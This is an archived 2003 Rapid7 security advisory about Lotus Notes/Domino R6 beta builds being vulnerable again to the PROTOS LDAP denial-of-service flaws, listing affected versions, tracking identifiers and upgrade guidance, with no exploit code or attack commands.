14th Mar 2003 [SBWID-6063]
COMMAND
	Lotus Notes/Domino R6-beta PROTOS LDAP Denial of Service Regression
SYSTEMS AFFECTED
	1. Affected system(s):
	   KNOWN VULNERABLE:
	    o Lotus Notes/Domino R6 pre-release and beta versions
	    o Lotus Domino R5.0.7 and earlier
	   NOT VULNERABLE:
	    o Lotus Notes/Domino R6.0 Gold
	    o Lotus Notes/Domino R6.0.1
	    o Lotus Notes/Domino R5.0.7a through R5.0.12
PROBLEM
	
	_______________________________________________________________________
	                     Rapid7, Inc. Security Advisory
	      Visit http://www.rapid7.com/ to download NeXpose, the
	           world's most advanced vulnerability scanner.
	       Linux and Windows 2000/XP versions are available now!
	_______________________________________________________________________
	Rapid7 Advisory R7-0012
	Lotus Notes/Domino R6-beta PROTOS LDAP Denial of Service Regression
	   Published:  March 12, 2003
	   Revision:   1.0
	   http://www.rapid7.com/advisories/R7-0012.html
	   CVE:           CAN-2001-1311 (regression)
	   CERT Note:     583184        (regression)
	   CERT Advisory: CA-2001-18    (regression)
	   Lotus SPR:     DWUU4W6NC8    (regression)
	   Bugtraq ID:    7039
	
	2. Summary
	   In July 2001, the PROTOS protocol testing group at the University
	   of Oulu in Finland released an LDAP protocol test suite that exposed
	   flaws in LDAP implementations from multiple vendors.  [1]
	   Lotus Domino R5.0.7 and earlier were affected by the PROTOS LDAP
	   issues, resulting in buffer overflows and denial of service against
	   the Domino server.  Lotus addressed these issues in Domino R5.0.7a,
	   released May 18th 2001.  [2]
	   While regression testing the pre-release and beta versions of Lotus
	   Domino R6 with the PROTOS LDAP test suite, we found that these
	   releases were vulnerable to the issues PROTOS discovered.
	5. Detailed analysis
	   Credit for discovery of this vulnerability goes to the PROTOS
	   project.  Please see their LDAP test suite page for more
	   information. [1]
SOLUTION
	4. Solution
	   Users running R6 beta and pre-release builds should upgrade to R6.0
	   Gold or higher.  Due to other vulnerabilities discovered in R6.0
	   Gold, you should consider upgrading to R6.0.1, which was released in
	   February 2003.
	   Users running R5.0.7a and higher are not affected.
	   Domino incremental installers may be downloaded from the following
	   URL (which has been wrapped):
	
	      http://www14.software.ibm.com
	         /webapp/download/search.jsp?go=y&rs=ESD-DMNTSRVRi&sb=r
	
	
	3. Vendor status and information
	   Lotus
	   http://www.lotus.com/
	   http://www.ibm.com/
	   Lotus was notified and they have fixed this vulnerability.  Lotus
	   originally tracked these issues as SPR #DWUU4W6NC8 and are tracking
	   the R6 beta issues with this SPR.  [3]
	   See the References section for more information.
	6. References
	   [1] PROTOS - Security Testing of Protocol Implementations
	   http://www.ee.oulu.fi/research/ouspg/protos/
	   [2] Lotus statement about LDAP vulnerability fixes
	   http://www.kb.cert.org/vuls/id/JPLA-4WESN5
	   [3] Lotus SPR #DWUU4W6NC8
	   http://www.notes.net/r5fixlist.nsf/Search!SearchView&Query=DWUU4W6NC8
	7. Contact Information
	   Rapid7 Security Advisories
	   Email:  [email protected]
	   Web:    http://www.rapid7.com/
	   Phone:  +1 (212) 558-8700
	8. Disclaimer and Copyright
	   Rapid7, Inc. is not responsible for the misuse of the information
	   provided in our security advisories.  These advisories are a service
	   to the professional security community.  There are NO WARRANTIES
	   with regard to this information.  Any application or distribution of
	   this information constitutes acceptance AS IS, at the user's own
	   risk.  This information is subject to change without notice.
	   This advisory Copyright (C) 2003 Rapid7, Inc.  Permission is
	   hereby granted to redistribute this advisory, providing that no
	   changes are made and that the copyright notices and disclaimers
	   remain intact.